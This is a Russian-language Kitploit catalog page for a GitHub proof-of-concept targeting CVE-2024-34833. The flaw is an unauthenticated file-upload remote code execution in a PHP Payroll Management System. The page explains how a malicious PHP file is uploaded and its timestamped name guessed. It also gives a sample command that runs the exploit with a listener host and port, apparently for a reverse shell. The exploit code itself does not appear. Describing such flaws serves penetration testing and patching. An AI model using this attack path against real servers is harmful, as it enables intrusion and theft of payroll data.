Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-34833-payroll-management-system-rce | Kitploit
Инструменты/GitHubGitHub/shellunease/cve-2024-34833-payroll-management-system-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubshellunease/cve-2024-34833-payroll-management-system-rce

CVE-2024-34833-payroll-management-system-rce

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
2 лет назадЕщё не проверено

CVE-2024-34833 Payroll Management System RCE (без аутентификации) PoC

RCE через загрузку файлов для https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html. К именам файлов добавляется временная метка с точностью до минуты. Скрипт пытается угадать имя файла, используя временную метку текущей, предыдущей и следующей минуты.

Описание уязвимости

Payroll Management System v1.0 позволяет пользователям загружать изображения через страницу "save_settings". Неаутентифицированный злоумышленник может использовать эту функцию для загрузки вместо них вредоносного PHP-файла. Загруженные файлы сохраняются в общедоступной папке, и к их именам добавляется временная метка с точностью до минуты, которую легко вычислить. Успешная эксплуатация этой уязвимости позволяет выполнять произвольный код от имени пользователя, под которым работает веб-сервер.

Пример использования

root@kitploit:~
python3 exploit.py -rhost somewebsite.com -rport 443 -lhost 192.168.22.23 -lport 443 -https

Пример видео

Скачать инструмент